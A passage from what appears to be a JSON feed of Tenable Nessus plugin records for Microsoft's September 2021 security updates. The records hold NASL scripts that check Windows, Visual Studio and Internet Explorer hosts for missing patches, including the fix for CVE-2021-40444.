"CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005569.NASL", "href": "https://www.tenable.com/plugins/nessus/153372", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153372);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005569\");\n script_xref(name:\"MSFT\", value:\"MS21-5005569\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005569: Windows 10 version 1507 LTS September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005569.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36967, CVE-2021-36973, CVE-2021-36974,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005569-os-build-10240-19060-0de156d8-d616-49bb-ad8d-3cf352611ca4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?322a809c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005569.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005569');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'10240',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005569])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:26", "description": "The remote Windows host is missing security update 5005573.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005573: Windows 10 Version 1607 and Windows Server 2016 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005573.NASL", "href": "https://www.tenable.com/plugins/nessus/153377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153377);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005573\");\n script_xref(name:\"MSFT\", value:\"MS21-5005573\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005573: Windows 10 Version 1607 and Windows Server 2016 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005573.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36967, CVE-2021-36973, CVE-2021-36974,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005573-os-build-14393-4651-48853795-3857-4485-a2bf-f15b39464b41\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be42cfd3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005573.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005573');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005573])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:14:06", "description": "This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-05T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_IE_SEPT_2021.NASL", "href": "https://www.tenable.com/plugins/nessus/153214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2021/09/23. Deprecated due to patch tuesday patches.\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153214);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/05\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus \nPlugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383 ');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:04", "description": "The Microsoft Visual Studio Products are missing a security update. They are, therefore, affected by multiple vulnerabilities:\n\n - A permission assignment vulnerability exists in Visual Studio after installing the Game development with C++ and selecting the Unreal Engine Installer workload. The system is vulnerable to LPE during the installation it creates a directory with write access to all users. (CVE-2021-26434)\n\n - A code execution vulnerability exists in Visual Studio due to incorrect memory handling. An unauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary commands. (CVE-2021-36952) \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-16T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Visual Studio Products (September 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26434", "CVE-2021-36952"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/a:microsoft:visual_studio"], "id": "SMB_NT_MS21_SEP_VISUAL_STUDIO.NASL", "href": "https://www.tenable.com/plugins/nessus/153428", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153428);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\"CVE-2021-26434\", \"CVE-2021-36952\");\n script_xref(name:\"IAVA\", value:\"2021-A-0430-S\");\n\n script_name(english:\"Security Updates for Microsoft Visual Studio Products (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Visual Studio Products are missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Visual Studio Products are missing a security update. They are, therefore, affected by multiple\nvulnerabilities:\n\n - A permission assignment vulnerability exists in Visual Studio after installing the Game development with C++\n and selecting the Unreal Engine Installer workload. The system is vulnerable to LPE during the installation \n it creates a directory with write access to all users. (CVE-2021-26434)\n\n - A code execution vulnerability exists in Visual Studio due to incorrect memory handling. An unauthenticated, \n local attacker can exploit this to bypass authentication and execute arbitrary commands. (CVE-2021-36952) \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://docs.microsoft.com/en-us/visualstudio/releases/2019/release-notes#16.11.3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1db01a4c\");\n # https://docs.microsoft.com/en-us/visualstudio/releases/2019/release-notes-v16.9#16.9.11\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c03ca82f\");\n # https://docs.microsoft.com/en-us/visualstudio/releases/2019/release-notes-v16.7#16.7.19\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ae9fc5ee\");\n # https://docs.microsoft.com/en-us/visualstudio/releases/2019/release-notes-v16.4#16.4.26\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ee4d9587\");\n # https://docs.microsoft.com/en-us/visualstudio/releasenotes/vs2017-relnotes#15.9.39\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e51fa707\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n - Update 15.9.39 for Visual Studio 2017\n - Update 16.4.26 for Visual Studio 2019\n - Update 16.7.19 for Visual Studio 2019\n - Update 16.9.11 for Visual Studio 2019\n - Update 16.11.3 for Visual Studio 2019\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26434\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_studio\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_visual_studio_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Visual Studio\", \"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\ninclude('vcf_extras_visual_studio.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\nvar app_info = vcf::visual_studio::get_app_info();\n\nvar constraints = [\n {'product': '2017', 'fixed_version': '15.9.28307.1684'},\n {'product': '2019', 'min_version': '16.0', 'fixed_version': '16.4.31709.291'},\n {'product': '2019', 'min_version': '16.5', 'fixed_version': '16.7.31701.349'},\n {'product': '2019', 'min_version': '16.8', 'fixed_version': '16.9.31702.126'},\n {'product': '2019', 'min_version': '16.10', 'fixed_version': '16.11.31702.278'}\n];\n\nvcf::visual_studio::check_version_and_report(\n app_info: app_info, \n constraints: constraints, \n severity: SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:39", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a memory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. (CVE-2021-40444)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (September 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/153374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153374);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"MSKB\", value:\"5005563\");\n script_xref(name:\"MSKB\", value:\"5005606\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005623\");\n script_xref(name:\"MSKB\", value:\"5005633\");\n script_xref(name:\"MSFT\", value:\"MS21-5005563\");\n script_xref(name:\"MSFT\", value:\"MS21-5005606\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005623\");\n script_xref(name:\"MSFT\", value:\"MS21-5005633\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Internet Explorer (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a\nmemory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute\narbitrary commands. (CVE-2021-40444)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005613\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005633\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5005563\n -KB5005606\n -KB5005613\n -KB5005623\n -KB5005633\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 